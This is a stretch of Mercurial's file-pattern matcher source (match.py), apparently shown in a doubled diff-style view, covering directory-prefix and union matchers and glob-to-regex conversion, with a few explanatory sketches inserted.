924 # call the original matcher with the subdirectory path prepended.
924 # call the original matcher with the subdirectory path prepended.
925 return self._matcher.matchfn(self._path + "/" + f)
925 return self._matcher.matchfn(self._path + "/" + f)
926
926
927 def visitdir(self, dir):
927 def visitdir(self, dir):
928 dir = normalizerootdir(dir, 'visitdir')
928 dir = normalizerootdir(dir, 'visitdir')
929 if dir == '':
929 if dir == '':
930 dir = self._path
930 dir = self._path
931 else:
931 else:
932 dir = self._path + "/" + dir
932 dir = self._path + "/" + dir
933 return self._matcher.visitdir(dir)
933 return self._matcher.visitdir(dir)
934
934
935 def visitchildrenset(self, dir):
935 def visitchildrenset(self, dir):
936 dir = normalizerootdir(dir, 'visitchildrenset')
936 dir = normalizerootdir(dir, 'visitchildrenset')
937 if dir == '':
937 if dir == '':
938 dir = self._path
938 dir = self._path
939 else:
939 else:
940 dir = self._path + "/" + dir
940 dir = self._path + "/" + dir
941 return self._matcher.visitchildrenset(dir)
941 return self._matcher.visitchildrenset(dir)
942
942
943 def always(self):
943 def always(self):
944 return self._always
944 return self._always
945
945
946 def prefix(self):
946 def prefix(self):
947 return self._matcher.prefix() and not self._always
947 return self._matcher.prefix() and not self._always
948
948
949 @encoding.strmethod
949 @encoding.strmethod
950 def __repr__(self):
950 def __repr__(self):
951 return ('<subdirmatcher path=%r, matcher=%r>' %
951 return ('<subdirmatcher path=%r, matcher=%r>' %
952 (self._path, self._matcher))
952 (self._path, self._matcher))
953
953
954 class prefixdirmatcher(basematcher):
954 class prefixdirmatcher(basematcher):
955 """Adapt a matcher to work on a parent directory.
955 """Adapt a matcher to work on a parent directory.
956
956
957 The matcher's non-matching-attributes (bad, explicitdir, traversedir) are
957 The matcher's non-matching-attributes (bad, explicitdir, traversedir) are
958 ignored.
958 ignored.
959
959
960 The prefix path should usually be the relative path from the root of
960 The prefix path should usually be the relative path from the root of
961 this matcher to the root of the wrapped matcher.
961 this matcher to the root of the wrapped matcher.
962
962
963 >>> m1 = match(util.localpath(b'root/d/e'), b'f', [b'../a.txt', b'b.txt'])
963 >>> m1 = match(util.localpath(b'root/d/e'), b'f', [b'../a.txt', b'b.txt'])
964 >>> m2 = prefixdirmatcher(b'd/e', m1)
964 >>> m2 = prefixdirmatcher(b'd/e', m1)
965 >>> m2(b'a.txt')
965 >>> m2(b'a.txt')
966 False
966 False
967 >>> m2(b'd/e/a.txt')
967 >>> m2(b'd/e/a.txt')
968 True
968 True
969 >>> m2(b'd/e/b.txt')
969 >>> m2(b'd/e/b.txt')
970 False
970 False
971 >>> m2.files()
971 >>> m2.files()
972 ['d/e/a.txt', 'd/e/f/b.txt']
972 ['d/e/a.txt', 'd/e/f/b.txt']
973 >>> m2.exact(b'd/e/a.txt')
973 >>> m2.exact(b'd/e/a.txt')
974 True
974 True
975 >>> m2.visitdir(b'd')
975 >>> m2.visitdir(b'd')
976 True
976 True
977 >>> m2.visitdir(b'd/e')
977 >>> m2.visitdir(b'd/e')
978 True
978 True
979 >>> m2.visitdir(b'd/e/f')
979 >>> m2.visitdir(b'd/e/f')
980 True
980 True
981 >>> m2.visitdir(b'd/e/g')
981 >>> m2.visitdir(b'd/e/g')
982 False
982 False
983 >>> m2.visitdir(b'd/ef')
983 >>> m2.visitdir(b'd/ef')
984 False
984 False
985 """
985 """
986
986
987 def __init__(self, path, matcher, badfn=None):
987 def __init__(self, path, matcher, badfn=None):
988 super(prefixdirmatcher, self).__init__(badfn)
988 super(prefixdirmatcher, self).__init__(badfn)
989 if not path:
989 if not path:
990 raise error.ProgrammingError('prefix path must not be empty')
990 raise error.ProgrammingError('prefix path must not be empty')
991 self._path = path
991 self._path = path
992 self._pathprefix = path + '/'
992 self._pathprefix = path + '/'
993 self._matcher = matcher
993 self._matcher = matcher
994
994
995 @propertycache
995 @propertycache
996 def _files(self):
996 def _files(self):
997 return [self._pathprefix + f for f in self._matcher._files]
997 return [self._pathprefix + f for f in self._matcher._files]
998
998
999 def matchfn(self, f):
999 def matchfn(self, f):
1000 if not f.startswith(self._pathprefix):
1000 if not f.startswith(self._pathprefix):
1001 return False
1001 return False
1002 return self._matcher.matchfn(f[len(self._pathprefix):])
1002 return self._matcher.matchfn(f[len(self._pathprefix):])
1003
1003
1004 @propertycache
1004 @propertycache
1005 def _pathdirs(self):
1005 def _pathdirs(self):
1006 return set(util.finddirs(self._path))
1006 return set(util.finddirs(self._path))
1007
1007
1008 def visitdir(self, dir):
1008 def visitdir(self, dir):
1009 if dir == self._path:
1009 if dir == self._path:
1010 return self._matcher.visitdir('')
1010 return self._matcher.visitdir('')
1011 if dir.startswith(self._pathprefix):
1011 if dir.startswith(self._pathprefix):
1012 return self._matcher.visitdir(dir[len(self._pathprefix):])
1012 return self._matcher.visitdir(dir[len(self._pathprefix):])
1013 return dir in self._pathdirs
1013 return dir in self._pathdirs
1014
1014
1015 def visitchildrenset(self, dir):
1015 def visitchildrenset(self, dir):
1016 if dir == self._path:
1016 if dir == self._path:
1017 return self._matcher.visitchildrenset('')
1017 return self._matcher.visitchildrenset('')
1018 if dir.startswith(self._pathprefix):
1018 if dir.startswith(self._pathprefix):
1019 return self._matcher.visitchildrenset(dir[len(self._pathprefix):])
1019 return self._matcher.visitchildrenset(dir[len(self._pathprefix):])
1020 if dir in self._pathdirs:
1020 if dir in self._pathdirs:
1021 return 'this'
1021 return 'this'
1022 return set()
1022 return set()
1023
1023
1024 def isexact(self):
1024 def isexact(self):
1025 return self._matcher.isexact()
1025 return self._matcher.isexact()
1026
1026
1027 def prefix(self):
1027 def prefix(self):
1028 return self._matcher.prefix()
1028 return self._matcher.prefix()
1029
1029
1030 @encoding.strmethod
1030 @encoding.strmethod
1031 def __repr__(self):
1031 def __repr__(self):
1032 return ('<prefixdirmatcher path=%r, matcher=%r>'
1032 return ('<prefixdirmatcher path=%r, matcher=%r>'
1033 % (pycompat.bytestr(self._path), self._matcher))
1033 % (pycompat.bytestr(self._path), self._matcher))
1034
1034
1035 class unionmatcher(basematcher):
1035 class unionmatcher(basematcher):
1036 """A matcher that is the union of several matchers.
1036 """A matcher that is the union of several matchers.
1037
1037
1038 The non-matching-attributes (bad, explicitdir, traversedir) are taken from
1038 The non-matching-attributes (bad, explicitdir, traversedir) are taken from
1039 the first matcher.
1039 the first matcher.
1040 """
1040 """
1041
1041
1042 def __init__(self, matchers):
1042 def __init__(self, matchers):
1043 m1 = matchers[0]
1043 m1 = matchers[0]
1044 super(unionmatcher, self).__init__()
1044 super(unionmatcher, self).__init__()
1045 self.explicitdir = m1.explicitdir
1045 self.explicitdir = m1.explicitdir
1046 self.traversedir = m1.traversedir
1046 self.traversedir = m1.traversedir
1047 self._matchers = matchers
1047 self._matchers = matchers
1048
1048
1049 def matchfn(self, f):
1049 def matchfn(self, f):
1050 for match in self._matchers:
1050 for match in self._matchers:
1051 if match(f):
1051 if match(f):
1052 return True
1052 return True
1053 return False
1053 return False
1054
1054
1055 def visitdir(self, dir):
1055 def visitdir(self, dir):
1056 r = False
1056 r = False
1057 for m in self._matchers:
1057 for m in self._matchers:
1058 v = m.visitdir(dir)
1058 v = m.visitdir(dir)
1059 if v == 'all':
1059 if v == 'all':
1060 return v
1060 return v
1061 r |= v
1061 r |= v
1062 return r
1062 return r
1063
1063
1064 def visitchildrenset(self, dir):
1064 def visitchildrenset(self, dir):
1065 r = set()
1065 r = set()
1066 this = False
1066 this = False
1067 for m in self._matchers:
1067 for m in self._matchers:
1068 v = m.visitchildrenset(dir)
1068 v = m.visitchildrenset(dir)
1069 if not v:
1069 if not v:
1070 continue
1070 continue
1071 if v == 'all':
1071 if v == 'all':
1072 return v
1072 return v
1073 if this or v == 'this':
1073 if this or v == 'this':
1074 this = True
1074 this = True
1075 # don't break, we might have an 'all' in here.
1075 # don't break, we might have an 'all' in here.
1076 continue
1076 continue
1077 assert isinstance(v, set)
1077 assert isinstance(v, set)
1078 r = r.union(v)
1078 r = r.union(v)
1079 if this:
1079 if this:
1080 return 'this'
1080 return 'this'
1081 return r
1081 return r
1082
1082
1083 @encoding.strmethod
1083 @encoding.strmethod
1084 def __repr__(self):
1084 def __repr__(self):
1085 return ('<unionmatcher matchers=%r>' % self._matchers)
1085 return ('<unionmatcher matchers=%r>' % self._matchers)
1086
1086
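# Editor's note: the matching sketch (hypothetical helper, illustration
# only) for unionmatcher.visitchildrenset() above. 'this' does not
# short-circuit the scan, because a later matcher may still answer 'all',
# which dominates everything.

def union_visit(answers):
    result = set()
    sticky_this = False
    for v in answers:
        if not v:
            continue                # an empty answer contributes nothing
        if v == 'all':
            return 'all'            # dominates every other answer
        if v == 'this' or sticky_this:
            sticky_this = True      # remember, but keep scanning for 'all'
            continue
        result |= v
    return 'this' if sticky_this else result

assert union_visit([{'a'}, {'b'}]) == {'a', 'b'}
assert union_visit([set(), 'this', 'all']) == 'all'
assert union_visit(['this', {'a'}]) == 'this'
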
1087 def patkind(pattern, default=None):
1087 def patkind(pattern, default=None):
1088 '''If pattern is 'kind:pat' with a known kind, return kind.
1088 '''If pattern is 'kind:pat' with a known kind, return kind.
1089
1089
1090 >>> patkind(br're:.*\.c$')
1090 >>> patkind(br're:.*\.c$')
1091 're'
1091 're'
1092 >>> patkind(b'glob:*.c')
1092 >>> patkind(b'glob:*.c')
1093 'glob'
1093 'glob'
1094 >>> patkind(b'relpath:test.py')
1094 >>> patkind(b'relpath:test.py')
1095 'relpath'
1095 'relpath'
1096 >>> patkind(b'main.py')
1096 >>> patkind(b'main.py')
1097 >>> patkind(b'main.py', default=b're')
1097 >>> patkind(b'main.py', default=b're')
1098 're'
1098 're'
1099 '''
1099 '''
1100 return _patsplit(pattern, default)[0]
1100 return _patsplit(pattern, default)[0]
1101
1101
1102 def _patsplit(pattern, default):
1102 def _patsplit(pattern, default):
1103 """Split a string into the optional pattern kind prefix and the actual
1103 """Split a string into the optional pattern kind prefix and the actual
1104 pattern."""
1104 pattern."""
1105 if ':' in pattern:
1105 if ':' in pattern:
1106 kind, pat = pattern.split(':', 1)
1106 kind, pat = pattern.split(':', 1)
1107 if kind in allpatternkinds:
1107 if kind in allpatternkinds:
1108 return kind, pat
1108 return kind, pat
1109 return default, pattern
1109 return default, pattern
1110
1110
1111 def _globre(pat):
1111 def _globre(pat):
1112 r'''Convert an extended glob string to a regexp string.
1112 r'''Convert an extended glob string to a regexp string.
1113
1113
1114 >>> from . import pycompat
1114 >>> from . import pycompat
1115 >>> def bprint(s):
1115 >>> def bprint(s):
1116 ... print(pycompat.sysstr(s))
1116 ... print(pycompat.sysstr(s))
1117 >>> bprint(_globre(br'?'))
1117 >>> bprint(_globre(br'?'))
1118 .
1118 .
1119 >>> bprint(_globre(br'*'))
1119 >>> bprint(_globre(br'*'))
1120 [^/]*
1120 [^/]*
1121 >>> bprint(_globre(br'**'))
1121 >>> bprint(_globre(br'**'))
1122 .*
1122 .*
1123 >>> bprint(_globre(br'**/a'))
1123 >>> bprint(_globre(br'**/a'))
1124 (?:.*/)?a
1124 (?:.*/)?a
1125 >>> bprint(_globre(br'a/**/b'))
1125 >>> bprint(_globre(br'a/**/b'))
1126 a/(?:.*/)?b
1126 a/(?:.*/)?b
1127 >>> bprint(_globre(br'[a*?!^][^b][!c]'))
1127 >>> bprint(_globre(br'[a*?!^][^b][!c]'))
1128 [a*?!^][\^b][^c]
1128 [a*?!^][\^b][^c]
1129 >>> bprint(_globre(br'{a,b}'))
1129 >>> bprint(_globre(br'{a,b}'))
1130 (?:a|b)
1130 (?:a|b)
1131 >>> bprint(_globre(br'.\*\?'))
1131 >>> bprint(_globre(br'.\*\?'))
1132 \.\*\?
1132 \.\*\?
1133 '''
1133 '''
1134 i, n = 0, len(pat)
1134 i, n = 0, len(pat)
1135 res = ''
1135 res = ''
1136 group = 0
1136 group = 0
1137 escape = util.stringutil.regexbytesescapemap.get
1137 escape = util.stringutil.regexbytesescapemap.get
1138 def peek():
1138 def peek():
1139 return i < n and pat[i:i + 1]
1139 return i < n and pat[i:i + 1]
1140 while i < n:
1140 while i < n:
1141 c = pat[i:i + 1]
1141 c = pat[i:i + 1]
1142 i += 1
1142 i += 1
1143 if c not in '*?[{},\\':
1143 if c not in '*?[{},\\':
1144 res += escape(c, c)
1144 res += escape(c, c)
1145 elif c == '*':
1145 elif c == '*':
1146 if peek() == '*':
1146 if peek() == '*':
1147 i += 1
1147 i += 1
1148 if peek() == '/':
1148 if peek() == '/':
1149 i += 1
1149 i += 1
1150 res += '(?:.*/)?'
1150 res += '(?:.*/)?'
1151 else:
1151 else:
1152 res += '.*'
1152 res += '.*'
1153 else:
1153 else:
1154 res += '[^/]*'
1154 res += '[^/]*'
1155 elif c == '?':
1155 elif c == '?':
1156 res += '.'
1156 res += '.'
1157 elif c == '[':
1157 elif c == '[':
1158 j = i
1158 j = i
1159 if j < n and pat[j:j + 1] in '!]':
1159 if j < n and pat[j:j + 1] in '!]':
1160 j += 1
1160 j += 1
1161 while j < n and pat[j:j + 1] != ']':
1161 while j < n and pat[j:j + 1] != ']':
1162 j += 1
1162 j += 1
1163 if j >= n:
1163 if j >= n:
1164 res += '\\['
1164 res += '\\['
1165 else:
1165 else:
1166 stuff = pat[i:j].replace('\\','\\\\')
1166 stuff = pat[i:j].replace('\\','\\\\')
1167 i = j + 1
1167 i = j + 1
1168 if stuff[0:1] == '!':
1168 if stuff[0:1] == '!':
1169 stuff = '^' + stuff[1:]
1169 stuff = '^' + stuff[1:]
1170 elif stuff[0:1] == '^':
1170 elif stuff[0:1] == '^':
1171 stuff = '\\' + stuff
1171 stuff = '\\' + stuff
1172 res = '%s[%s]' % (res, stuff)
1172 res = '%s[%s]' % (res, stuff)
1173 elif c == '{':
1173 elif c == '{':
1174 group += 1
1174 group += 1
1175 res += '(?:'
1175 res += '(?:'
1176 elif c == '}' and group:
1176 elif c == '}' and group:
1177 res += ')'
1177 res += ')'
1178 group -= 1
1178 group -= 1
1179 elif c == ',' and group:
1179 elif c == ',' and group:
1180 res += '|'
1180 res += '|'
1181 elif c == '\\':
1181 elif c == '\\':
1182 p = peek()
1182 p = peek()
1183 if p:
1183 if p:
1184 i += 1
1184 i += 1
1185 res += escape(p, p)
1185 res += escape(p, p)
1186 else:
1186 else:
1187 res += escape(c, c)
1187 res += escape(c, c)
1188 else:
1188 else:
1189 res += escape(c, c)
1189 res += escape(c, c)
1190 return res
1190 return res
1191
1191
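# Editor's note: a quick, standalone illustration (not hg code) of why the
# translations above behave like rooted extended globs. The regex strings
# are taken from the doctest outputs of _globre().
import re

pat = re.compile(r'a/(?:.*/)?b$')      # _globre(br'a/**/b') plus a '$' suffix
assert pat.match('a/b')
assert pat.match('a/x/y/b')
assert not pat.match('a/xb')           # '**/' must match whole components

star = re.compile(r'[^/]*$')           # _globre(br'*'): '*' stops at '/'
assert star.match('file.txt')
assert not star.match('dir/file.txt')
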
1192 def _regex(kind, pat, globsuffix):
1192 def _regex(kind, pat, globsuffix):
1193 '''Convert a (normalized) pattern of any kind into a
1193 '''Convert a (normalized) pattern of any kind into a
1194 regular expression.
1194 regular expression.
1195 globsuffix is appended to the regexp of globs.'''
1195 globsuffix is appended to the regexp of globs.'''
1196
1196
1197 if rustmod is not None:
1197 if rustmod is not None:
1198 try:
1198 try:
1199 return rustmod.build_single_regex(
1199 return rustmod.build_single_regex(
1200 kind,
1200 kind,
1201 pat,
1201 pat,
1202 globsuffix
1202 globsuffix
1203 )
1203 )
1204 except rustmod.PatternError:
1204 except rustmod.PatternError:
1205 raise error.ProgrammingError(
1205 raise error.ProgrammingError(
1206 'not a regex pattern: %s:%s' % (kind, pat)
1206 'not a regex pattern: %s:%s' % (kind, pat)
1207 )
1207 )
1208
1208
1209 if not pat and kind in ('glob', 'relpath'):
1209 if not pat and kind in ('glob', 'relpath'):
1210 return ''
1210 return ''
1211 if kind == 're':
1211 if kind == 're':
1212 return pat
1212 return pat
1213 if kind in ('path', 'relpath'):
1213 if kind in ('path', 'relpath'):
1214 if pat == '.':
1214 if pat == '.':
1215 return ''
1215 return ''
1216 return util.stringutil.reescape(pat) + '(?:/|$)'
1216 return util.stringutil.reescape(pat) + '(?:/|$)'
1217 if kind == 'rootfilesin':
1217 if kind == 'rootfilesin':
1218 if pat == '.':
1218 if pat == '.':
1219 escaped = ''
1219 escaped = ''
1220 else:
1220 else:
1221 # Pattern is a directory name.
1221 # Pattern is a directory name.
1222 escaped = util.stringutil.reescape(pat) + '/'
1222 escaped = util.stringutil.reescape(pat) + '/'
1223 # Anything after the pattern must be a non-directory.
1223 # Anything after the pattern must be a non-directory.
1224 return escaped + '[^/]+$'
1224 return escaped + '[^/]+$'
1225 if kind == 'relglob':
1225 if kind == 'relglob':
1226 return '(?:|.*/)' + _globre(pat) + globsuffix
1226 return '(?:|.*/)' + _globre(pat) + globsuffix
1227 if kind == 'relre':
1227 if kind == 'relre':
1228 if pat.startswith('^'):
1228 if pat.startswith('^'):
1229 return pat
1229 return pat
1230 return '.*' + pat
1230 return '.*' + pat
1231 if kind in ('glob', 'rootglob'):
1231 if kind in ('glob', 'rootglob'):
1232 return _globre(pat) + globsuffix
1232 return _globre(pat) + globsuffix
1233 raise error.ProgrammingError('not a regex pattern: %s:%s' % (kind, pat))
1233 raise error.ProgrammingError('not a regex pattern: %s:%s' % (kind, pat))
1234
1234
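# Editor's note: a standalone illustration (not hg code) of the 'path' and
# 'rootfilesin' translations above, using plain `re`.
import re

path_re = re.compile(r'foo/bar(?:/|$)')    # _regex('path', 'foo/bar', ...)
assert path_re.match('foo/bar')            # the path itself
assert path_re.match('foo/bar/baz.txt')    # anything beneath it
assert not path_re.match('foo/barista')    # no partial-component match

rfi_re = re.compile(r'foo/[^/]+$')         # _regex('rootfilesin', 'foo', ...)
assert rfi_re.match('foo/a.txt')           # direct children only
assert not rfi_re.match('foo/sub/a.txt')   # not grandchildren
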
1235 def _buildmatch(kindpats, globsuffix, root):
1235 def _buildmatch(kindpats, globsuffix, root):
1236 '''Return regexp string and a matcher function for kindpats.
1236 '''Return regexp string and a matcher function for kindpats.
1237 globsuffix is appended to the regexp of globs.'''
1237 globsuffix is appended to the regexp of globs.'''
1238 matchfuncs = []
1238 matchfuncs = []
1239
1239
1240 subincludes, kindpats = _expandsubinclude(kindpats, root)
1240 subincludes, kindpats = _expandsubinclude(kindpats, root)
1241 if subincludes:
1241 if subincludes:
1242 submatchers = {}
1242 submatchers = {}
1243 def matchsubinclude(f):
1243 def matchsubinclude(f):
1244 for prefix, matcherargs in subincludes:
1244 for prefix, matcherargs in subincludes:
1245 if f.startswith(prefix):
1245 if f.startswith(prefix):
1246 mf = submatchers.get(prefix)
1246 mf = submatchers.get(prefix)
1247 if mf is None:
1247 if mf is None:
1248 mf = match(*matcherargs)
1248 mf = match(*matcherargs)
1249 submatchers[prefix] = mf
1249 submatchers[prefix] = mf
1250
1250
1251 if mf(f[len(prefix):]):
1251 if mf(f[len(prefix):]):
1252 return True
1252 return True
1253 return False
1253 return False
1254 matchfuncs.append(matchsubinclude)
1254 matchfuncs.append(matchsubinclude)
1255
1255
1256 regex = ''
1256 regex = ''
1257 if kindpats:
1257 if kindpats:
1258 if all(k == 'rootfilesin' for k, p, s in kindpats):
1258 if all(k == 'rootfilesin' for k, p, s in kindpats):
1259 dirs = {p for k, p, s in kindpats}
1259 dirs = {p for k, p, s in kindpats}
1260 def mf(f):
1260 def mf(f):
1261 i = f.rfind('/')
1261 i = f.rfind('/')
1262 if i >= 0:
1262 if i >= 0:
1263 dir = f[:i]
1263 dir = f[:i]
1264 else:
1264 else:
1265 dir = '.'
1265 dir = '.'
1266 return dir in dirs
1266 return dir in dirs
1267 regex = b'rootfilesin: %s' % stringutil.pprint(list(sorted(dirs)))
1267 regex = b'rootfilesin: %s' % stringutil.pprint(list(sorted(dirs)))
1268 matchfuncs.append(mf)
1268 matchfuncs.append(mf)
1269 else:
1269 else:
1270 regex, mf = _buildregexmatch(kindpats, globsuffix)
1270 regex, mf = _buildregexmatch(kindpats, globsuffix)
1271 matchfuncs.append(mf)
1271 matchfuncs.append(mf)
1272
1272
1273 if len(matchfuncs) == 1:
1273 if len(matchfuncs) == 1:
1274 return regex, matchfuncs[0]
1274 return regex, matchfuncs[0]
1275 else:
1275 else:
1276 return regex, lambda f: any(mf(f) for mf in matchfuncs)
1276 return regex, lambda f: any(mf(f) for mf in matchfuncs)
1277
1277
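# Editor's note: standalone illustration (not hg code) of the 'rootfilesin'
# fast path in _buildmatch() above: instead of a regex, membership of the
# file's directory name in a set decides the match.
dirs = {'lib', 'src/core'}

def rootfilesin_mf(f):
    i = f.rfind('/')
    return (f[:i] if i >= 0 else '.') in dirs

assert rootfilesin_mf('lib/a.py')
assert not rootfilesin_mf('lib/sub/a.py')     # only direct children match
assert not rootfilesin_mf('toplevel.py')      # its directory is '.'
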
1278 MAX_RE_SIZE = 20000
1278 MAX_RE_SIZE = 20000
1279
1279
1280 def _joinregexes(regexps):
1280 def _joinregexes(regexps):
1281 """gather multiple regular expressions into a single one"""
1281 """gather multiple regular expressions into a single one"""
1282 return '|'.join(regexps)
1282 return '|'.join(regexps)
1283
1283
1284 def _buildregexmatch(kindpats, globsuffix):
1284 def _buildregexmatch(kindpats, globsuffix):
1285 """Build a match function from a list of kinds and kindpats,
1285 """Build a match function from a list of kinds and kindpats,
1286 return regexp string and a matcher function.
1286 return regexp string and a matcher function.
1287
1287
1288 Test too large input
1288 Test too large input
1289 >>> _buildregexmatch([
1289 >>> _buildregexmatch([
1290 ... (b'relglob', b'?' * MAX_RE_SIZE, b'')
1290 ... (b'relglob', b'?' * MAX_RE_SIZE, b'')
1291 ... ], b'$')
1291 ... ], b'$')
1292 Traceback (most recent call last):
1292 Traceback (most recent call last):
1293 ...
1293 ...
1294 Abort: matcher pattern is too long (20009 bytes)
1294 Abort: matcher pattern is too long (20009 bytes)
1295 """
1295 """
1296 try:
1296 try:
1297 allgroups = []
1297 allgroups = []
1298 regexps = [_regex(k, p, globsuffix) for (k, p, s) in kindpats]
1298 regexps = [_regex(k, p, globsuffix) for (k, p, s) in kindpats]
1299 fullregexp = _joinregexes(regexps)
1299 fullregexp = _joinregexes(regexps)
1300
1300
1301 startidx = 0
1301 startidx = 0
1302 groupsize = 0
1302 groupsize = 0
1303 for idx, r in enumerate(regexps):
1303 for idx, r in enumerate(regexps):
1304 piecesize = len(r)
1304 piecesize = len(r)
1305 if piecesize > MAX_RE_SIZE:
1305 if piecesize > MAX_RE_SIZE:
1306 msg = _("matcher pattern is too long (%d bytes)") % piecesize
1306 msg = _("matcher pattern is too long (%d bytes)") % piecesize
1307 raise error.Abort(msg)
1307 raise error.Abort(msg)
1308 elif (groupsize + piecesize) > MAX_RE_SIZE:
1308 elif (groupsize + piecesize) > MAX_RE_SIZE:
1309 group = regexps[startidx:idx]
1309 group = regexps[startidx:idx]
1310 allgroups.append(_joinregexes(group))
1310 allgroups.append(_joinregexes(group))
1311 startidx = idx
1311 startidx = idx
1312 groupsize = 0
1312 groupsize = 0
1313 groupsize += piecesize + 1
1313 groupsize += piecesize + 1
1314
1314
1315 if startidx == 0:
1315 if startidx == 0:
1316 matcher = _rematcher(fullregexp)
1316 matcher = _rematcher(fullregexp)
1317 func = lambda s: bool(matcher(s))
1317 func = lambda s: bool(matcher(s))
1318 else:
1318 else:
1319 group = regexps[startidx:]
1319 group = regexps[startidx:]
1320 allgroups.append(_joinregexes(group))
1320 allgroups.append(_joinregexes(group))
1321 allmatchers = [_rematcher(g) for g in allgroups]
1321 allmatchers = [_rematcher(g) for g in allgroups]
1322 func = lambda s: any(m(s) for m in allmatchers)
1322 func = lambda s: any(m(s) for m in allmatchers)
1323 return fullregexp, func
1323 return fullregexp, func
1324 except re.error:
1324 except re.error:
1325 for k, p, s in kindpats:
1325 for k, p, s in kindpats:
1326 try:
1326 try:
1327 _rematcher(_regex(k, p, globsuffix))
1327 _rematcher(_regex(k, p, globsuffix))
1328 except re.error:
1328 except re.error:
1329 if s:
1329 if s:
1330 raise error.Abort(_("%s: invalid pattern (%s): %s") %
1330 raise error.Abort(_("%s: invalid pattern (%s): %s") %
1331 (s, k, p))
1331 (s, k, p))
1332 else:
1332 else:
1333 raise error.Abort(_("invalid pattern (%s): %s") % (k, p))
1333 raise error.Abort(_("invalid pattern (%s): %s") % (k, p))
1334 raise error.Abort(_("invalid pattern"))
1334 raise error.Abort(_("invalid pattern"))
1335
1335
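# Editor's note: a simplified, self-contained sketch (not the hg
# implementation) of the grouping strategy in _buildregexmatch() above:
# join as many alternatives as fit under a size budget, compile each group
# separately, and match if any compiled group matches. Names are
# illustrative.
import re

def chunked_matcher(regexps, max_size):
    groups, current, size = [], [], 0
    for r in regexps:
        if len(r) > max_size:
            raise ValueError('pattern too long (%d bytes)' % len(r))
        if size + len(r) > max_size and current:
            groups.append('|'.join(current))
            current, size = [], 0
        current.append(r)
        size += len(r) + 1              # +1 for the '|' separator
    if current:
        groups.append('|'.join(current))
    compiled = [re.compile(g) for g in groups]
    return lambda s: any(m.match(s) for m in compiled)

m = chunked_matcher(['foo.*', 'bar.*', 'baz.*'], max_size=12)
assert m('food') and m('barn') and not m('qux')
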
1336 def _patternrootsanddirs(kindpats):
1336 def _patternrootsanddirs(kindpats):
1337 '''Returns roots and directories corresponding to each pattern.
1337 '''Returns roots and directories corresponding to each pattern.
1338
1338
1339 This calculates the roots and directories exactly matching the patterns and
1339 This calculates the roots and directories exactly matching the patterns and
1340 returns a tuple of (roots, dirs) for each. It does not return other
1340 returns a tuple of (roots, dirs) for each. It does not return other
1341 directories which may also need to be considered, like the parent
1341 directories which may also need to be considered, like the parent
1342 directories.
1342 directories.
1343 '''
1343 '''
1344 r = []
1344 r = []
1345 d = []
1345 d = []
1346 for kind, pat, source in kindpats:
1346 for kind, pat, source in kindpats:
1347 if kind in ('glob', 'rootglob'): # find the non-glob prefix
1347 if kind in ('glob', 'rootglob'): # find the non-glob prefix
1348 root = []
1348 root = []
1349 for p in pat.split('/'):
1349 for p in pat.split('/'):
1350 if '[' in p or '{' in p or '*' in p or '?' in p:
1350 if '[' in p or '{' in p or '*' in p or '?' in p:
1351 break
1351 break
1352 root.append(p)
1352 root.append(p)
1353 r.append('/'.join(root))
1353 r.append('/'.join(root))
1354 elif kind in ('relpath', 'path'):
1354 elif kind in ('relpath', 'path'):
1355 if pat == '.':
1355 if pat == '.':
1356 pat = ''
1356 pat = ''
1357 r.append(pat)
1357 r.append(pat)
1358 elif kind in ('rootfilesin',):
1358 elif kind in ('rootfilesin',):
1359 if pat == '.':
1359 if pat == '.':
1360 pat = ''
1360 pat = ''
1361 d.append(pat)
1361 d.append(pat)
1362 else: # relglob, re, relre
1362 else: # relglob, re, relre
1363 r.append('')
1363 r.append('')
1364 return r, d
1364 return r, d
1365
1365
1366 def _roots(kindpats):
1366 def _roots(kindpats):
1367 '''Returns root directories to match recursively from the given patterns.'''
1367 '''Returns root directories to match recursively from the given patterns.'''
1368 roots, dirs = _patternrootsanddirs(kindpats)
1368 roots, dirs = _patternrootsanddirs(kindpats)
1369 return roots
1369 return roots
1370
1370
1371 def _rootsdirsandparents(kindpats):
1371 def _rootsdirsandparents(kindpats):
1372 '''Returns roots and exact directories from patterns.
1372 '''Returns roots and exact directories from patterns.
1373
1373
1374 `roots` are directories to match recursively, `dirs` should
1374 `roots` are directories to match recursively, `dirs` should
1375 be matched non-recursively, and `parents` are the implicitly required
1375 be matched non-recursively, and `parents` are the implicitly required
1376 directories to walk to items in either roots or dirs.
1376 directories to walk to items in either roots or dirs.
1377
1377
1378 Returns a tuple of (roots, dirs, parents).
1378 Returns a tuple of (roots, dirs, parents).
1379
1379
1380 >>> r = _rootsdirsandparents(
1380 >>> r = _rootsdirsandparents(
1381 ... [(b'glob', b'g/h/*', b''), (b'glob', b'g/h', b''),
1381 ... [(b'glob', b'g/h/*', b''), (b'glob', b'g/h', b''),
1382 ... (b'glob', b'g*', b'')])
1382 ... (b'glob', b'g*', b'')])
1383 >>> print(r[0:2], sorted(r[2])) # the set has an unstable output
1383 >>> print(r[0:2], sorted(r[2])) # the set has an unstable output
1384 (['g/h', 'g/h', ''], []) ['', 'g']
1384 (['g/h', 'g/h', ''], []) ['', 'g']
1385 >>> r = _rootsdirsandparents(
1385 >>> r = _rootsdirsandparents(
1386 ... [(b'rootfilesin', b'g/h', b''), (b'rootfilesin', b'', b'')])
1386 ... [(b'rootfilesin', b'g/h', b''), (b'rootfilesin', b'', b'')])
1387 >>> print(r[0:2], sorted(r[2])) # the set has an unstable output
1387 >>> print(r[0:2], sorted(r[2])) # the set has an unstable output
1388 ([], ['g/h', '']) ['', 'g']
1388 ([], ['g/h', '']) ['', 'g']
1389 >>> r = _rootsdirsandparents(
1389 >>> r = _rootsdirsandparents(
1390 ... [(b'relpath', b'r', b''), (b'path', b'p/p', b''),
1390 ... [(b'relpath', b'r', b''), (b'path', b'p/p', b''),
1391 ... (b'path', b'', b'')])
1391 ... (b'path', b'', b'')])
1392 >>> print(r[0:2], sorted(r[2])) # the set has an unstable output
1392 >>> print(r[0:2], sorted(r[2])) # the set has an unstable output
1393 (['r', 'p/p', ''], []) ['', 'p']
1393 (['r', 'p/p', ''], []) ['', 'p']
1394 >>> r = _rootsdirsandparents(
1394 >>> r = _rootsdirsandparents(
1395 ... [(b'relglob', b'rg*', b''), (b're', b're/', b''),
1395 ... [(b'relglob', b'rg*', b''), (b're', b're/', b''),
1396 ... (b'relre', b'rr', b'')])
1396 ... (b'relre', b'rr', b'')])
1397 >>> print(r[0:2], sorted(r[2])) # the set has an unstable output
1397 >>> print(r[0:2], sorted(r[2])) # the set has an unstable output
1398 (['', '', ''], []) ['']
1398 (['', '', ''], []) ['']
1399 '''
1399 '''
1400 r, d = _patternrootsanddirs(kindpats)
